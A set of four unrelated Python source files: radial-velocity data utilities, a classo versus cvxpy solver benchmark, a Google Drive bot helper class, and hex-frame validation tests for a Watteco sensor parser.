data[no_wmean_cols].select_dtypes(include=np.number).columns
)
first_cols = (
data[no_wmean_cols].select_dtypes(exclude=np.number).columns
)
# Dictionary to tell agg which function to use on which columns
agg_funcs = {
**dict.fromkeys(mean_cols, "mean"),
**dict.fromkeys(first_cols, "first"),
}
# Perform operations
agg_data = grouped_data.agg(agg_funcs)
binned_data = grouped_data.apply(get_wmean, wmean_pairs)
binned_data[agg_data.columns] = agg_data
# We now reset the ROW index that was lost in the binning
# This makes the data more uniform with the pre-binning data
no_date_data = binned_data.reset_index("DATE-OBS", drop=True)
rows_per_file = no_date_data.groupby("OBJECT").size().apply(np.arange)
rows = np.concatenate(rows_per_file)
row_ind = pd.Index(rows, name="ROW")
binned_data = no_date_data.set_index(row_ind, append=True)
else:
mean_cols = data.select_dtypes(include=np.number).columns
first_cols = data.select_dtypes(exclude=np.number).columns
# Dictionary to tell agg which function to use on which columns
agg_funcs = {
**dict.fromkeys(mean_cols, "mean"),
**dict.fromkeys(first_cols, "first"),
}
binned_data = grouped_data.agg(agg_funcs)
return binned_data
def bin_tbl(
tbl: Table,
wmean_pairs: dict[str, str],
) -> Table:
tbl2_dict = {colname: [] for colname in tbl.colnames}
dates = tbl["DATE-OBS"]
udates = np.unique(dates)
for i in tqdm(range(len(udates))):
epoch = udates[i]
epoch_mask = dates == epoch
itbl = tbl[epoch_mask]
for colname in tbl.colnames:
if colname in wmean_pairs:
# get value and error for this udate
vals = itbl[colname]
errs = itbl[wmean_pairs[colname]]
# get error^2
errs2 = errs ** 2
# deal with all nans
if np.sum(np.isfinite(errs2)) == 0:
value = np.nan
err_value = np.nan
else:
# get 1/error^2
value = np.nansum(vals / errs2) / np.nansum(1 / errs2)
err_value = np.sqrt(1 / np.nansum(1 / errs2))
# push into table
tbl2_dict[colname].append(value)
tbl2_dict[wmean_pairs[colname]].append(err_value)
# -----------------------------------------------------------------
# if no weighted mean indication, try to mean the column or if not
# just take the first value
elif colname not in wmean_pairs.values():
# try to produce the mean of rdb table
# noinspection PyBroadException
try:
tbl2_dict[colname].append(np.mean(itbl[colname]))
except TypeError:
tbl2_dict[colname].append(itbl[colname][0])
tbl2 = Table()
for colname in tbl2_dict:
tbl2[colname] = tbl2_dict[colname]
return tbl2
def get_obj_vals(
data: DataFrame, obj_col: str = "OBJECT", unique: bool = False
):
if obj_col in data.index.names:
ovals = data.index.get_level_values(obj_col).values
elif obj_col in data.columns:
msg = f"{obj_col} is not an index." "Trying to filter with columns"
warnings.warn(msg)
ovals = data[obj_col].values
else:
raise ValueError(f"obj_col={obj_col} is not an index or a column.")
return ovals.values if not unique else np.unique(ovals)
def tt_atleast_1d(x):
"""
Attempt of theano equiavalent to numpy atleast_1d
"""
if x.broadcastable == ():
return x.dimshuffle("x")
return x
def load_config(path: Union[str, Path]):
with open(path) as ymlfile:
config = yaml.safe_load(ymlfile)
return Box(config)
def make_unique_dir(path: Union[str, Path]) -> Path:
path = Path(path)
path_ini = path
while path.exists():
# This should not block more than one second unless dir already
# exist for some reason. Still probably safer/clearer than _0, _1, etc.
ext_time = "_" + datetime.now().strftime("%y%m%d_%H%M%S")
path = append_to_dirpath(path_ini, ext_time)
path.mkdir(parents=True)
return path
def save_map_dict(map_dict: dict, path: Union[Path, str], force: bool = False):
path = Path(path)
if path.exists() and not force:
raise FileExistsError(
f"File {path} exists. Use force=True to overwrite"
)
pkl_ext = [".pkl", ".pickle"]
if path.suffix not in pkl_ext:
raise ValueError(
"Please use one of the following file extension for a pickle"
f" file: {pkl_ext}"
)
with open(path, "wb") as pfile:
pickle.dump(map_dict, pfile)
def get_config_params(config: Box):
model_params = config.model_parameters
if isinstance(model_params, str):
if not model_params.endswith(".yml"):
raise ValueError(
"model_params should be a dictionary or a yml file"
)
params_file = Path(model_params)
# If not an absolut path, assume from config dir
if not params_file.is_absolute():
parent_dir = Path(config.config).parent
params_file = parent_dir / params_file
model_params = load_config(params_file)
if "model_parameters" in model_params:
model_params = model_params["model_parameters"]
return model_params
elif isinstance(model_params, dict):
return model_params
else:
raise TypeError(
"model_parameters should be a dictionary or a path to a file"
)
def get_substr_keys(
substr: str,
model: Optional[ZeroPointModel] = None,
post: Optional[Dataset] = None,
map_dict: Optional[dict] = None,
) -> list[str]:
if model is not None:
keys = [k for k in model.named_vars.keys() if substr in k]
elif post is not None:
keys = [k for k in post.data_vars.keys() if substr in k]
elif map_dict is not None:
keys = [k for k in map_dict.keys() if substr in k]
else:
raise TypeError("One of model or post is required.")
return keys
def print_data_info(
data: DataFrame, config: Box, wn_dict: Optional[dict[str, float]] = None
):
for obj in data.index.get_level_values("OBJECT").unique():
odata = data.loc[obj]
print(f"Info for {obj}")
print(f" Mean RV error: {np.mean(odata[config.svrad_col])}")
print(f" Median RV error: {np.median(odata[config.svrad_col])}")
print(f" RV scatter: {np.std(odata[config.svrad_col])}")
if wn_dict is not None:
print(f" White noise term: {wn_dict[obj]}")
def get_summary(group):
d = dict()
d["npts"] = group.shape[0]
d["range"] = group.rjd.max() - group.rjd.min()
d["vrad_std"] = group.vrad.std()
d["svrad_mean"] = group.svrad.mean()
return pd.Series(d, index=list(d))
|
<filename>benchmark/R2/bm-R2.py
import numpy as np
import numpy.linalg as LA
from classo import classo_problem, random_data
import cvxpy as cp
from time import time
import os
my_path = os.path.dirname(__file__)
l = [1, 2, 5, 7]
def huber(r, rho):
F = abs(r) >= rho
h = r**2
h[F] = 2*rho*abs(r)[F] - rho**2
return h
def loss(X, y, lamb, rho, beta):
r = X.dot(beta) - y
return np.sum(huber(r,rho)) + lamb*np.sum(abs(beta))
d_nonzero = 5
sigma = 0.5
lam = 0.1
N_per_data = 5
N_data = 20
S = [50, 100, 200, 500]
SIZES = []
for i in range(len(S)):
SIZES.append((S[i], S[i]))
if i+1<len(S):
SIZES.append((S[i], S[i+1]))
N_sizes = len(SIZES)
T_pa = np.zeros((N_sizes, N_data))
L_pa = np.zeros((N_sizes, N_data))
C_pa = np.zeros((N_sizes, N_data))
T_pds = np.zeros((N_sizes, N_data))
L_pds = np.zeros((N_sizes, N_data))
C_pds = np.zeros((N_sizes, N_data))
T_dr = np.zeros((N_sizes, N_data))
L_dr = np.zeros((N_sizes, N_data))
C_dr = np.zeros((N_sizes, N_data))
T_cvx = np.zeros((N_sizes, N_data))
L_cvx = np.zeros((N_sizes, N_data))
C_cvx = np.zeros((N_sizes, N_data))
for s in range(N_sizes):
m, d = SIZES[s]
for i in range(N_data):
(X, C, y), sol = random_data(m, d, d_nonzero, 1, sigma, zerosum=True, seed=i)
rho = 1.345 * np.sqrt(np.mean(y**2))
F = abs(y) >= rho
lamb = lam*2*LA.norm(X[F].T.dot(y[F]),np.infty)
t0 = time()
# classo Path-Alg
b_pa = []
for j in range(N_per_data):
problem = classo_problem(X, y, C)
problem.formulation.concomitant = False
problem.formulation.huber = True
problem.formulation.scale_rho = False
problem.formulation.rho = rho
problem.model_selection.StabSel = False
problem.model_selection.LAMfixed = True
problem.model_selection.LAMfixedparameters.rescaled_lam = False
problem.model_selection.LAMfixedparameters.lam = lamb
problem.model_selection.LAMfixedparameters.numerical_method = 'Path-Alg'
problem.solve()
b_pa.append(problem.solution.LAMfixed.beta)
b_pa = np.array(b_pa)
t1 = time()
# classo P-PDS
b_pds = []
for j in range(N_per_data):
problem = classo_problem(X, y, C)
problem.formulation.concomitant = False
problem.formulation.huber = True
problem.formulation.scale_rho = False
problem.formulation.rho = rho
problem.model_selection.StabSel = False
problem.model_selection.LAMfixed = True
problem.model_selection.LAMfixedparameters.rescaled_lam = False
problem.model_selection.LAMfixedparameters.lam = lamb
problem.model_selection.LAMfixedparameters.numerical_method = 'P-PDS'
problem.solve()
b_pds.append(problem.solution.LAMfixed.beta)
b_pds = np.array(b_pds)
t2 = time()
# classo DR
b_dr = []
for j in range(N_per_data):
problem = classo_problem(X, y, C)
problem.formulation.concomitant = False
problem.formulation.huber = True
problem.formulation.scale_rho = False
problem.formulation.rho = rho
problem.model_selection.StabSel = False
problem.model_selection.LAMfixed = True
problem.model_selection.LAMfixedparameters.rescaled_lam = False
problem.model_selection.LAMfixedparameters.lam = lamb
problem.model_selection.LAMfixedparameters.numerical_method = 'P-PDS'
problem.solve()
b_dr.append(problem.solution.LAMfixed.beta)
b_dr = np.array(b_dr)
t3 = time()
# cvx
b_cvx = []
for j in range(N_per_data):
beta = cp.Variable(d)
objective = cp.Minimize(cp.sum(cp.huber(X@beta-y, rho))+ lamb*cp.norm(beta, 1))
constraints = [C@beta == 0]
prob = cp.Problem(objective, constraints)
result = prob.solve(warm_start = False, eps_abs = 1e-5)
b_cvx.append(beta.value)
b_cvx = np.array(b_cvx)
t4 = time()
T_pa[s, i] = (t1 - t0) / N_per_data
L_pa[s, i] = loss(X, y, lamb, rho, np.mean(b_pa, axis=0))
C_pa[s, i] = np.linalg.norm(C.dot(np.mean(b_pa, axis=0)))
T_pds[s, i] = (t2 - t1) / N_per_data
L_pds[s, i] = loss(X, y, lamb, rho, np.mean(b_pds, axis=0))
C_pds[s, i] = np.linalg.norm(C.dot(np.mean(b_pds, axis=0)))
T_dr[s, i] = (t3 - t0) / N_per_data
L_dr[s, i] = loss(X, y, lamb, rho, np.mean(b_dr, axis=0))
C_dr[s, i] = np.linalg.norm(C.dot(np.mean(b_pds, axis=0)))
T_cvx[s, i] = (t4 - t3) / N_per_data
L_cvx[s, i] = loss(X, y, lamb, rho, np.mean(b_cvx, axis=0))
C_cvx[s, i] = np.linalg.norm(C.dot(np.mean(b_cvx, axis=0)))
np.savez(
os.path.join(my_path, 'bm-R2.npz'),
T_pa = T_pa,
L_pa = L_pa,
C_pa = C_pa,
T_pds = T_pds,
L_pds = L_pds,
C_pds = C_pds,
T_dr = T_dr,
L_dr = L_dr,
C_dr = C_dr,
T_cvx = T_cvx,
L_cvx = L_cvx,
C_cvx = C_cvx,
SIZES = np.array(SIZES)
)
|
<gh_stars>0
import os
import re
import json
import logging
from bot import LOGGER
from time import sleep
from tenacity import *
import urllib.parse as urlparse
from bot.config import Messages
from mimetypes import guess_type
from urllib.parse import parse_qs
from bot.helpers.utils import humanbytes
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from googleapiclient.http import MediaFileUpload
from bot.helpers.sql_helper import gDriveDB, idsDB
logging.getLogger('googleapiclient.discovery').setLevel(logging.ERROR)
logging.getLogger('oauth2client.transport').setLevel(logging.ERROR)
logging.getLogger('oauth2client.client').setLevel(logging.ERROR)
class GoogleDrive:
def __init__(self, user_id):
self.__G_DRIVE_DIR_MIME_TYPE = "application/vnd.google-apps.folder"
self.__G_DRIVE_BASE_DOWNLOAD_URL = "https://drive.google.com/uc?id={}&export=download"
self.__G_DRIVE_DIR_BASE_DOWNLOAD_URL = "https://drive.google.com/drive/folders/{}"
self.__service = self.authorize(gDriveDB.search(user_id))
self.__parent_id = idsDB.search_parent(user_id)
def getIdFromUrl(self, link: str):
if "folders" in link or "file" in link:
regex = r"https://drive\.google\.com/(drive)?/?u?/?\d?/?(mobile)?/?(file)?(folders)?/?d?/([-\w]+)[?+]?/?(w+)?"
res = re.search(regex,link)
if res is None:
raise IndexError("GDrive ID not found.")
return res.group(5)
parsed = urlparse.urlparse(link)
return parse_qs(parsed.query)['id'][0]
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def getFilesByFolderId(self, folder_id):
page_token = None
q = f"'{folder_id}' in parents"
files = []
while True:
response = self.__service.files().list(supportsTeamDrives=True,
includeTeamDriveItems=True,
q=q,
spaces='drive',
pageSize=200,
fields='nextPageToken, files(id, name, mimeType,size)',
pageToken=page_token).execute()
for file in response.get('files', []):
files.append(file)
page_token = response.get('nextPageToken', None)
if page_token is None:
break
return files
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def copyFile(self, file_id, dest_id):
body = {'parents': [dest_id]}
try:
res = self.__service.files().copy(supportsAllDrives=True,fileId=file_id,body=body).execute()
return res
except HttpError as err:
if err.resp.get('content-type', '').startswith('application/json'):
reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
if reason == 'dailyLimitExceeded':
raise IndexError('LimitExceeded')
else:
raise err
def cloneFolder(self, name, local_path, folder_id, parent_id):
files = self.getFilesByFolderId(folder_id)
new_id = None
if len(files) == 0:
return self.__parent_id
for file in files:
if file.get('mimeType') == self.__G_DRIVE_DIR_MIME_TYPE:
file_path = os.path.join(local_path, file.get('name'))
current_dir_id = self.create_directory(file.get('name'))
new_id = self.cloneFolder(file.get('name'), file_path, file.get('id'), current_dir_id)
else:
try:
self.transferred_size += int(file.get('size'))
except TypeError:
pass
try:
self.copyFile(file.get('id'), parent_id)
new_id = parent_id
except Exception as err:
return err
return new_id
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def create_directory(self, directory_name):
file_metadata = {
"name": directory_name,
"mimeType": self.__G_DRIVE_DIR_MIME_TYPE
}
file_metadata["parents"] = [self.__parent_id]
file = self.__service.files().create(supportsTeamDrives=True, body=file_metadata).execute()
file_id = file.get("id")
return file_id
def clone(self, link):
self.transferred_size = 0
try:
file_id = self.getIdFromUrl(link)
except (IndexError, KeyError):
return Messages.INVALID_GDRIVE_URL
try:
meta = self.__service.files().get(supportsAllDrives=True, fileId=file_id, fields="name,id,mimeType,size").execute()
if meta.get("mimeType") == self.__G_DRIVE_DIR_MIME_TYPE:
dir_id = self.create_directory(meta.get('name'))
result = self.cloneFolder(meta.get('name'), meta.get('name'), meta.get('id'), dir_id)
return Messages.COPIED_SUCCESSFULLY.format(meta.get('name'), self.__G_DRIVE_DIR_BASE_DOWNLOAD_URL.format(dir_id), humanbytes(self.transferred_size))
else:
file = self.copyFile(meta.get('id'), self.__parent_id)
return Messages.COPIED_SUCCESSFULLY.format(file.get('name'), self.__G_DRIVE_BASE_DOWNLOAD_URL.format(file.get('id')), humanbytes(int(meta.get('size'))))
except Exception as err:
if isinstance(err, RetryError):
LOGGER.info(f"Total Attempts: {err.last_attempt.attempt_number}")
err = err.last_attempt.exception()
err = str(err).replace('>', '').replace('<', '')
LOGGER.error(err)
return f"**ERROR:** ```{err}```"
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def upload_file(self, file_path, mimeType=None):
mime_type = mimeType if mimeType else guess_type(file_path)[0]
mime_type = mime_type if mime_type else "text/plain"
media_body = MediaFileUpload(
file_path,
mimetype=mime_type,
chunksize=150*1024*1024,
resumable=True
)
filename = os.path.basename(file_path)
filesize = humanbytes(os.path.getsize(file_path))
body = {
"name": filename,
"description": "Uploaded using @UploadGdriveBot",
"mimeType": mime_type,
}
body["parents"] = [self.__parent_id]
LOGGER.info(f'Upload: {file_path}')
try:
uploaded_file = self.__service.files().create(body=body, media_body=media_body, fields='id', supportsTeamDrives=True).execute()
file_id = uploaded_file.get('id')
return Messages.UPLOADED_SUCCESSFULLY.format(filename, self.__G_DRIVE_BASE_DOWNLOAD_URL.format(file_id), filesize)
except HttpError as err:
if err.resp.get('content-type', '').startswith('application/json'):
reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
if reason == 'userRateLimitExceeded' or reason == 'dailyLimitExceeded':
return Messages.RATE_LIMIT_EXCEEDED_MESSAGE
else:
return f"**ERROR:** {reason}"
except Exception as e:
return f"**ERROR:** ```{e}```"
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def checkFolderLink(self, link: str):
try:
file_id = self.getIdFromUrl(link)
except (IndexError, KeyError):
raise IndexError
try:
file = self.__service.files().get(supportsAllDrives=True, fileId=file_id, fields="mimeType").execute()
except HttpError as err:
if err.resp.get('content-type', '').startswith('application/json'):
reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
if 'notFound' in reason:
return False, Messages.FILE_NOT_FOUND_MESSAGE.format(file_id)
else:
return False, f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"
if str(file.get('mimeType')) == self.__G_DRIVE_DIR_MIME_TYPE:
return True, file_id
else:
return False, Messages.NOT_FOLDER_LINK
@retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
def delete_file(self, link: str):
try:
file_id = self.getIdFromUrl(link)
except (IndexError, KeyError):
return Messages.INVALID_GDRIVE_URL
try:
self.__service.files().delete(fileId=file_id, supportsTeamDrives=True).execute()
return Messages.DELETED_SUCCESSFULLY.format(file_id)
except HttpError as err:
if err.resp.get('content-type', '').startswith('application/json'):
reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
if 'notFound' in reason:
return Messages.FILE_NOT_FOUND_MESSAGE.format(file_id)
elif 'insufficientFilePermissions' in reason:
return Messages.INSUFFICIENT_PERMISSONS.format(file_id)
else:
return f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"
def emptyTrash(self):
try:
self.__service.files().emptyTrash().execute()
return Messages.EMPTY_TRASH
except HttpError as err:
return f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"
def authorize(self, creds):
return build('drive', 'v3', credentials=creds, cache_discovery=False) |
<filename>srcWatteco/_ValidationTests.py
#!python
# -*- coding: utf-8 -*-
# TODO: Continuer ce fichier de tests automatisés (pour Non reg ou autres ...)
from _TestsTools import *
WTCParseInit()
# XYZAcceleration
WTCParseBuildTest(STDFrame, "11 05 800F 8000 41 17 0064 03E8 0003 1B58 0136 0136 0136 0000 03E8 4E20 90 03 07")
WTCParseBuildTest(STDFrame, "1101800F80000041170064271000031B5800A000A00136000003E84E20901407")
# WTCParse("11 05 800F 8000 41 17 0064 03E8 0003 1B58 0136 0136 0136 0000 03E8 4E20 90 03 87")
WTCParseBuildTest(STDFrame, "11 0a 800f 0000 41 16 0000 0001 0000 0000 0000 0000 0000 0000 023f 0399 1522 98")
WTCParseBuildTest(STDFrame, "11 0a 800f 0003 41 14 0001 0236 0312 1b62 0236 0312 1b62 0236 0312 1b62")
WTCParseBuildTest(STDFrame, "11 06 800F 84 0001 41 8001 85A0 01 00", ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 800F 84 0001 41 8001 85A0 00")
WTCParseBuildTest(STDFrame, "11 06 800F 98 0000 41 0003 801E 06 C8 00 00000001")
# Using configuration Cluster
WTCParseBuildTest(STDFrame, "11 0A 0050 0006 41 05 01 04 0D50 04")
WTCParseBuildTest(STDFrame, "110000500004")
WTCParseBuildTest(STDFrame, "110100500004004C001F02000800500406000F800A0402040504030400000104040204050403800A00")
# Simple-Metering
WTCParseBuildTest(STDFrame, "11010052000000410C000000000002000300040005")
# Calibration
WTCParseBuildTest(STDFrame, "310000528000")
WTCParseBuildTest(STDFrame, "31010052800000410901032c100006632000")
WTCParseBuildTest(STDFrame, "510000528000")
WTCParseBuildTest(STDFrame, "51010052800000410901019e1000068f4000")
# Binary input
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E84844f5e000")
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E8B044f5e00044f5e000434944f5e000")
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E8B044f5e00044f5e000800001FFFF4944f5e000")
#report Alarme with Long cause Binary Input Count
WTCParseBuildTest(STDFrame, "118a000f0402230000000aa0d00000000a0000000001")
# Configure std report on Binary EP 5 and expected response
WTCParseBuildTest(STDFrame, "b106000f00005510000a800a01")
WTCParseBuildTest(STDFrame, "b107000f00000402")
# Configure batch report on Binary EP 5 and expected response
WTCParseBuildTest(STDFrame, "b106000f1d0402000000800a000000640000000101")
WTCParseBuildTest(STDFrame, "b107000f00010402")
# TIC CBE report
WTCParseBuildTest(STDFrame, "110A005405004119 260706082122 0000000D 0000000E 0000000F 41 414243444500", ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110A005405004119 260607082122 0000000D 0000000E 0000000F 41 414243444500")
# TIC CBE Config report
WTCParseBuildTest(STDFrame,
"11 06 0054 00 0200 41 8001 800A" "16" + # 22 (Sum)
"260607082122" + # 6
"24060708 0000000D 0000000E 0000000F" + # 16
"")
#TIC STD
WTCParseBuildTest(STDFrame, "11 0A 0056 0100 41 1F 27000102030405 426f6e6a6f7572202100 80 45010203040506 0F 08 80000000")
# TIC STD, PRODUCTEUR
WTCParseBuildTest(STDFrame,"110a00560000411f06018010002b303231393736303635363832000219000002a10167dfac0f0f")
# TIC STD, Read reporting configuration avec Descripteur citères vide
WTCParseBuildTest(STDFrame, "110900560000000041000085a00706018010002b21")
#TIC PMEPMI, STD, 31 premiers champs + PMAX_s et PMAX_i
WTCParseBuildTest(STDFrame,
"11 06 0057 00 0000 41 8001 800A" + "79" + #121 (Sum)
"05FFFFFFFF 090C000000FFFFFFFF" + # 14
"06 06010203040506 04 010220010203 800001 800002 800003 800004" + # 27
"800001 800002 800003 800004 04 05 8441424344 05" + # 20
"0000000A05 0000000B06 0000000C07 0000000D08" + # 20
"05 06 010101020202 FFFF" + # 10
"1000 0000000A 2000 3000 0000000B 4000 5000 0000000C " + # 22
"00000E 08 00000F 09" + # 8
"")
#TIC ICE, General:
# CONTRAT(CString),DATECOUR(DMYhms),EA(U24),ERP(U24),
# PTCOUR(CString),DATEPA1(DMYhms),PA1(U16),
# PA1MN(U16),PA10MN(U16),PREA10MN(U16),TGPHI(U32),U10MN(U16)
WTCParseBuildTest(STDFrame,
"11 0A 0053 0100 41 " + "3C" + # 60 (sum)
"071F80000003FB" + # 7
"4d6f6e436f6e7472617400 010100010130 00000A 00000B " + # 23
"48434800 44455000 010100010100 0010" + # 16
"0010 0011 0012 0013 00000013 0014" + # 14
"")
#TIC ICE ICEp1:
# DEBUTp1(DMYhms),Finp1(DMYhms),CAFp1(U16),
# EAp1P(U24),ERPp1P(U24),ERNp1P(U24)
WTCParseBuildTest(STDFrame,
"11 0A 0053 0102 41 " + "1E" + # 29 (sum)
"A7 00 01 02 04 13 22" + # 7
"010100010120 010100010121 1001" + # 14
"800010 800011 800012" + # 8
"")
WTCParseBuildTest(STDFrame,
"11 0A 0053 0102 41 " + "21" + # 33 (sum)
"A7 00 01 02 04 13 22" + # 7
"010100010120 010100010121 1001" + # 14
"800010 800011 800012 800013" + # 12
"",ERR_SYM_EXP=True)
# TIC CBE, Batch HCHC(7,U32),HCHP (8,u32)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09")
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09 00",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 03 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 07 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 ",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 0054 39 0000 02 0000 800a 00000064 00000001 01 08 0001 800b 00000065 00000002 09",ERR_PARSE_EXP=True)
# TIC STD, Batch EAST(5,U32),EAIT(20,U32),SINSTS(33,U24),SINSTS(33,U24)
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A")
# Error 00 excedent
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 00",ERR_PARSE_EXP=True)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# BEWARE FOLLOWING LINE MAKES ALL VALIDATION SCRIPT BROKEN ???????!!!!!!!!!!!!!
# Error 0000 excedent
#WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 0000",ERR_PARSE_EXP=True)
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# Error 000000 excedent
WTCParseBuildTest(STDFrame, "11 06 0056 69 0000 05 0000 800a 00000064 00000001 02 14 0001 800b 00000065 00000002 0A 21 0002 800c 000066 000001 12 21 0002 800c 000067 000001 1A 000000",ERR_PARSE_EXP=True)
# TIC PMEPMI, Batch PA1_s (23,U16), PA1_i (24,U16)
WTCParseBuildTest(STDFrame, "11 06 0057 29 0000 17 0000 800a 0032 0001 02 18 0001 800b 0033 0001 0A ")
# TIC ICE, Batch EA(3,U24),ERP(4,U24),PA1MN(39,U16),PA10MN(40,U16),PREA1MN(41,I16),PREA10MN(42,I16)
WTCParseBuildTest(STDFrame, "11 06 0053 81 0000 " +
"04 0000 803C 000001 000001 03 " +
"04 0000 803C 000001 000001 0B " +
"27 0000 803C 0001 0001 13 " +
"28 0000 803C 0001 0001 1B " +
"29 0000 803C FFFF FFFE 23 " +
"2A 0000 803C FFFD FFFC 2B " +
"")
WTCParseBuildTest(STDFrame,"110A005700004122680102030C28293706042036018312021709150A3B300D28D6B320005A320000300A",PRINT_JSON_IF_OK=True)
WTCParseBuildTest(STDFrame,"110A005700004122680102030C28293706042036018312021709150A3B300D28D6B320005A320000300A;rev=5339",PRINT_JSON_IF_OK=True)
#NOt already decoded frame
WTCParseBuildTest(STDFrame, "3106005231000000800F800F7FFFFF0000010B01800F800F7FFFFF00000113")
#BAD FRAMES EXEMPLES
WTCParseBuildTest(STDFrame, "110000520000FF",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "11010052000000420C000000000002000300040005")
WTCParseBuildTest(STDFrame, "5105800a0001230000000A")
WTCParseBuildTest(STDFrame, "3106800A000000410001000A200000000000000000000000000000000000000000000000000000000000000000")
WTCParseBuildTest(STDFrame, "1106800B000000410000800106000000000000")
WTCParseBuildTest(STDFrame, "1106800b800000410001800107700007d0006401")
WTCParseBuildTest(STDFrame, "1106800a80000041000180010b7005000003e80000006401")
WTCParseBuildTest(STDFrame, "11060050800006410005000a044804000a")
WTCParseBuildTest(STDFrame, "118a000f0402230000000aa0d00000000a0000000001")
WTCParseBuildTest(STDFrame, "110a005000064107010536d80e4e01a059022ee0000001")
WTCParseBuildTest(STDFrame, "110a005000064107010536d80e4e01")
WTCParseBuildTest(STDFrame, "110a04020000290102")
WTCParseBuildTest(STDFrame, "1108000f000055")
WTCParseBuildTest(STDFrame, "1106000f000402238001800a01020304")
WTCParseBuildTest(STDFrame, "1106000fA004022300008001D00000000a0000000001")
WTCParseBuildTest(STDFrame, "11060050A0000641000580011838022ee00000010600000001000259022ee0000001020003")
WTCParseBuildTest(STDFrame, "11060050A0000641000580011830022ee000000151022ee0000001",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "1106005000000641000aa76005000400c800")
WTCParseBuildTest(STDFrame, "1107000f00000055")
WTCParseBuildTest(STDFrame, "1100000f0055")
WTCParseBuildTest(STDFrame, "1101000f0055001001")
WTCParseBuildTest(STDFrame, "110100500006004107010536d80e4e01")
WTCParseBuildTest(STDFrame, "1150000602")
WTCParseBuildTest(STDFrame, "110a000c00553911111111")
WTCParseBuildTest(STDFrame, "1106000c000055390001001011111111")
WTCParseBuildTest(STDFrame, "1107000c80000055")
WTCParseBuildTest(STDFrame, "1108000c000055")
WTCParseBuildTest(STDFrame, "1109000c00000055390001001011111111")
WTCParseBuildTest(STDFrame, "1100000c0055")
WTCParseBuildTest(STDFrame, "1101000c0055003911111111")
WTCParseBuildTest(STDFrame, "1100000c0100")
WTCParseBuildTest(STDFrame, "1101000c0100002311111111")
WTCParseBuildTest(STDFrame, "110000000002")
WTCParseBuildTest(STDFrame, "110000000003")
WTCParseBuildTest(STDFrame, "110000000004")
WTCParseBuildTest(STDFrame, "110000000005")
WTCParseBuildTest(STDFrame, "110000000006")
WTCParseBuildTest(STDFrame, "110000000010")
WTCParseBuildTest(STDFrame, "110100000010004200")
WTCParseBuildTest(STDFrame, "11010000001080")
WTCParseBuildTest(STDFrame, "11010000800100420000",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110a000f00551001")
WTCParseBuildTest(STDFrame, "1106000f000055100001001000")
WTCParseBuildTest(STDFrame, "1107000f81000055")
WTCParseBuildTest(STDFrame, "1108000f000055")
WTCParseBuildTest(STDFrame, "1109000f81000055")
WTCParseBuildTest(STDFrame, "1100000f0055")
WTCParseBuildTest(STDFrame, "1101000f0055001001")
WTCParseBuildTest(STDFrame, "110a000f04022311111111")
WTCParseBuildTest(STDFrame, "1106000f000402230001001011111111")
WTCParseBuildTest(STDFrame, "1107000f80000402")
WTCParseBuildTest(STDFrame, "1108000f000402")
WTCParseBuildTest(STDFrame, "1109000f80000402230001001011111111",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "1100000f0402")
WTCParseBuildTest(STDFrame, "1101000f0402002311111111")
WTCParseBuildTest(STDFrame, "1100000f0054")
WTCParseBuildTest(STDFrame, "1101000f0054001000")
WTCParseBuildTest(STDFrame, "1105000f00541000")
WTCParseBuildTest(STDFrame, "1100000f0400")
